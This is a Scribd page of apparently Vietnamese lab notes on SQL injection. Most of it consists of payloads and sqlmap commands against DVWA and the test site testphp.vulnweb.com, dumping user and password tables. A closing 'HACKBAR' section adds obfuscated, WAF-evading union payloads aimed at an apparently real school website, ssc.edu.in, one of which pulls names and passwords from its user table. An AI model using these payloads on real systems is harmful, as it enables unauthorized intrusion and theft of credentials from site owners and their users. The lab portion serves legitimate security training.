Scribd
Upload
31 views3 pages

Lab 8

The document outlines various SQL injection techniques and commands used to exploit vulnerabilities in web applications, particularly focusing on the DVWA (Damn Vulnerable Web Application). It includes methods for executing low, medium, and high-level injections, as well as SQL injection blind techniques and the use of SQLMap for database enumeration and data extraction. Additionally, it provides examples of specific URLs and payloads for testing and exploiting these vulnerabilities.

Uploaded by

buiphucnhan20gg
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
31 views3 pages

Lab 8

The document outlines various SQL injection techniques and commands used to exploit vulnerabilities in web applications, particularly focusing on the DVWA (Damn Vulnerable Web Application). It includes methods for executing low, medium, and high-level injections, as well as SQL injection blind techniques and the use of SQLMap for database enumeration and data extraction. Additionally, it provides examples of specific URLs and payloads for testing and exploiting these vulnerabilities.

Uploaded by

buiphucnhan20gg
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

sudo system stop apache2

docker rm web-dvwa
docker run -d -p 80:80 --name web-dvwa vulnerables/web-dvwa (khởi chạy dvwa)

docker start web-dvwa


1. Low: Input được truyền trực tiếp qua GET parameter (URL).
1’ or 0=0 #
Kiểm tra các table tồn tại trong database: 1’ union select null, table_name from
information_schema.tables #
Liệt kê username và password trong table user: admin' OR '1'='1' UNION SELECT user,
password FROM users#

2. Medium: Input được gửi qua POST request (không hiện trên URL).
chinh thanh: "1 UNION SELECT user, password FROM users#" --> submit

3. High: Input được lưu vào Session (không truyền trực tiếp qua GET/POST).
Click here to change your id: 1' UNION SELECT user, password FROM users#
--> submit

4. SQL Injection Blind

SQL Injection Blind khác với ở SQL Injection ở chỗ câu lệnh SQL sẽ không trả ra một
kết quả cụ thể nào hết do đó chúng ta phải tiến hành dò đoán các thông tin liên
quan đến database

- Kiểm tra xem có xuất hiện lỗi hay không: 1’ and 1=1#
Kiểm tra độ dài tên của database có phải bằng 4 hay không:
1’ and length(database () ) = 4; #

- Kiểm tra kí tự đầu tiên trong tên database có phải là “d” hay không:
1’ and ascii (substr(database() ,1,1)) = 100#

- Kiểm tra xem số lượng trong database trong database đó có phải là 2 hay không:
1’ and (select count(table_name) from information_schema.tables where
table_schema = database() ) = 2 #

- Kiểm tra độ dài của tên table đầu tiên trong database có phải là 9 hay không:
1’ and length(substr(select table_name form information_schema.tables where
table_schema=database() limit 0,1), 1)) = 9#

- Kiểm tra xem kí tự đầu tiên của tên bảng đầu tiên trong database phải là “g”
không:
1' AND ascii(substr((SELECT table_name FROM information_schema.tables WHERE
table_schema=database() LIMIT 0,1),1,1)) = 103#

Medium: http://localhost/vulnerabilities/sqli_blind/?id=1%27%20AND%201=1%20--
+&Submit=Submit# --+&Submit=Submit

5. SQL Map

Copy cookie: PHPSESSID=pde143ds2ed5790e6h168lijv4; security=high

http://localhost/vulnerabilities/sqli/

sqlmap -u "<1>" --cookie="<2>" --data="<3>" -D dvwa -T users –dump


+ thay <1> bằng đường dẫn
+ thay <2> bằng giá trị cookie:
+ thay <3> bằng giá id=1&Submit=Submit

sqlmap -u "http://localhost/vulnerabilities/sqli/" --
cookie="PHPSESSID=pde143ds2ed5790e6h168lijv4; security=high" --
data="id=1&Submit=Submit" -D dvwa -T users –dump

sqlmap -u "http://localhost/vulnerabilities/sqli/" --cookie="<2>" --


data="id=1&Submit=Submit" -D dvwa -T users –dump

Khác 1:

phat hien injection: sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1"


--dbs --batch

Liet ke cac bang database: sqlmap -u "http://testphp.vulnweb.com/listproducts.php?


cat=1" -D acuart --tables

liet ke cot trong bang user sqlmap -u "http://testphp.vulnweb.com/listproducts.php?


cat=1" -D acuart -T users --columns

lay mat khau: sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D


acuart -T users -C uname,pass --dump

Hết

TẤN CÔNG HACKBAR


0. https://ssc.edu.in/newsdetails.php?id=26%27+order+by+16--%20-

---1. https://ssc.edu.in/newsdetails.php?id=26'+/*!50000union*/+/*!50000all*/+/*!
50000select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -

---2. https://ssc.edu.in/newsdetails.php?id=-26'+/*!50000union*/+/*!50000all*/+/*!
50000select*/+1,/*!50000concat/**Alfaz
Infosec**/*/(0x223e273e3c2f7469746c653e,0x3c6c696e6b2072656c3d227374796c65736865657
42220687265663d2268747470733a2f2f646576656c6f706d656e742e67756172646972616e2e6f7267
2f7075626c69632f6f6666696369616c2d6465666163652d706167652f646570656e64656e636965732
f6373732f726f6f742e6373732220747970653d22746578742f637373223e,0x3c62723e3c62723e3c2
f666f6e743e3c7461626c6520626f726465723d2232223e3c74686561643e3c74723e3c746820636f6c
7370616e3d2232223e3c6469762069643d2267756172646972616e2d6c6f676f223e3c696d672064726
1676761626c653d2266616c736522207372633d2268747470733a2f2f652e746f7034746f702e696f2f
705f333139313072643170312e706e67222077696474683d323030206865696768743d32303020616c7
43d225370656564557053616d75726169223e3c2f6469763e3c2f74683e3c2f74723e3c74723e3c7468
20636f6c7370616e3d2232223e3c683320616c69676e3d2263656e746572223e3c666f6e7420636f6c6
f723d22677265656e223e496e6a6563746564206279202d3a203c666f6e7420636f6c6f723d22726564
223e20616c66617a3c2f666f6e743e,0x20496E666F736563,0x3c2f68333e3c2f74683e3c2f74723e,
0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d226c656674223e3c666
f6e7420636f6c6f723d626c75653e56657273696f6e203d3d3d3d3e203c666f6e7420636f6c6f723d72
65643e,/*!50000VerSiOn/**Abbarh**/*/
(),0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d226c656674223e3c
666f6e7420636f6c6f723d626c75653e55736572203d3d3e203c666f6e7420636f6c6f723d7265643e,
/*!50000UsEr/**Alfaz
Infosec**/*/(),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c6
4697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d626c75653e4461746162617365
203d3d3d3e203c666f6e7420636f6c6f723d7265643e,/*!50000DaTabaSe/**Alfaz
Infosec**/*/(),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c6
4697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d7265643e546f74616c2044
617461626173653c2f74723e3c2f74683e3c74723e3c746820636f6c7370616e3d2232223e,
(SeLECT(@w)/*!50000FrOM/**Alfaz Infosec**/*/(/*!50000SeLECT/**Abbarh**/*/(@w:=0x00)
,(SeLECT(@w)/*!50000FrOM/**Alfaz Infosec**/*/(/*!50000InFOrMATIoN_SChEmA/**Alfaz
Infosec**/*/.SCheMaTA)/*!50000WhErE/**Alfaz
Infosec**/*/(@w)IN(@w:=/*!50000CoNCaT/**Alfaz
Infosec**/*/(0x20,@w,0x3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d
626c75653e,/*!50000sCheMa_NaMe/**Alfaz
Infosec**/*/,0x3c62723e))))w),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c737061
6e3d2232223e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d7265643
e557365722050726976696c6567653c2f74683e3c2f74723e,0x3c74723e3c74683e3c64697620616c6
9676e3d2263656e746572223e3c666f6e7420636f6c6f723d6379616e3e4e616d65204f66205461626c
653c2f74683e3c74683e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723
d6379616e3e4e616d65204f6620436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f
64793e,(selEct(@x)/*!50000fRom/**Alfaz Infosec**/*/(/*!50000sElect/**Alfaz
Infosec**/*/(@x:=0x00),(sElect(0)/*!From/**Alfaz Infosec**/*/(/*!
50000inforMation_schEma.coLuMns/**Alfaz Infosec**/*/)/*!50000Where/**Alfaz
Infosec**/*/(taBle_schema=/*!50000DatAbase/**Alfaz
Infosec**/*/())and(0x00)in(@x:=/*!50000coNcat/**Alfaz
Infosec***/(@x,0x3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e
2073697a653d333e,0x3c64697620616c69676e3d226c656674223e,/*!50000tAble_naMe/**Alfaz
Infosec**/*/,0x3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e20
73697a653d333e,0x3c64697620616c69676e3d226c656674223e,/*!50000colUmn_naMe/**Alfaz
Infosec**/*/,0x3c2f666f6e743e3c2f74643e3c2f74723e))))x)),3,4,5,6,7,8,9,10,11,12,13,
14,15-- -

------- 3. https://ssc.edu.in/newsdetails.php?id=-26'+/*!50000union*/+/*!
50000all*/+/*!50000select*/+1,/*!50000(SELECT(@x)FROM(SELECT(@x:=0x00)+,
(SELECT(@x)FROM(ssced1u4_sadvidya.user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,name,password
,0x3c62723e))))x),*/3,4,5,6,7,8,9,10,11,12,13,14,15-- -

You might also like